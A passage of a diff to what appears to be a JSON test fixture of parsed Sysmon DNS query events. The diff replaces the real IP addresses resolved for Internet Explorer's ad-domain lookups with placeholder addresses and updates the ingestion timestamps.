pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.692Z",
@@ -12899,11 +12760,11 @@
 },
 "answers": [
 {
- "data": "35.186.202.217",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -12911,7 +12772,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -12919,7 +12780,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -12927,7 +12788,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -12935,7 +12796,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 },
 {
@@ -12944,16 +12805,16 @@
 }
 ],
 "resolved_ip": [
- "35.186.202.217",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30",
+ "192.168.94.30",
 "2001:502:1ca1::30"
 ]
 },
@@ -12969,23 +12830,23 @@ "prod.y-medialink.com" ], "ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742112600Z", + "ingested": "2021-12-09T13:50:23.457323200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.693Z",
@@ -13049,37 +12910,37 @@
 "type": "CNAME"
 },
 {
- "data": "54.80.117.178",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.217.22.176",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "35.153.215.15",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.207.54.164",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.204.186.237",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.86.46.105",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "54.80.117.178",
- "3.217.22.176",
- "35.153.215.15",
- "52.207.54.164",
- "52.204.186.237",
- "52.86.46.105"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -13095,18 +12956,13 @@ "jadserve.postrelease.com" ], "ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742118400Z", + "ingested": "2021-12-09T13:50:23.457329Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13170,39 +13026,39 @@
 "type": "CNAME"
 },
 {
- "data": "107.21.43.184",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "54.164.220.86",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.72.172.174",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.209.65.250",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.94.51.187",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.193.211.130",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.214.47.10",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "18.214.151.246",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13211,15 +13067,15 @@
 }
 ],
 "resolved_ip": [
- "107.21.43.184",
- "54.164.220.86",
- "52.72.172.174",
- "3.209.65.250",
- "3.94.51.187",
- "34.193.211.130",
- "18.214.47.10",
- "18.214.151.246",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30"
 ]
 },
@@ -13236,22 +13092,15 @@ "appnexus-partners.tremorhub.com" ], "ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742124400Z", + "ingested": "2021-12-09T13:50:23.457334800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.693Z",
@@ -13319,23 +13168,23 @@
 "type": "CNAME"
 },
 {
- "data": "107.21.14.70",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "107.23.33.163",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "23.22.192.59",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "100.24.96.238",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13343,18 +13192,18 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "107.21.14.70",
- "107.23.33.163",
- "23.22.192.59",
- "100.24.96.238",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30"
+ "192.168.14.30"
 ]
 },
 "network": {
@@ -13371,19 +13220,16 @@ "x.dlx.addthis.com" ], "ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742132Z", + "ingested": "2021-12-09T13:50:23.457340500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13451,15 +13297,15 @@
 "type": "CNAME"
 },
 {
- "data": "18.205.112.71",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "50.19.40.146",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13467,7 +13313,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -13475,18 +13321,18 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "18.205.112.71",
- "50.19.40.146",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30"
+ "192.168.92.30"
 ]
 },
 "network": {
@@ -13503,19 +13349,18 @@ "dh.serving-sys.com" ], "ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742140700Z", + "ingested": "2021-12-09T13:50:23.457346200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 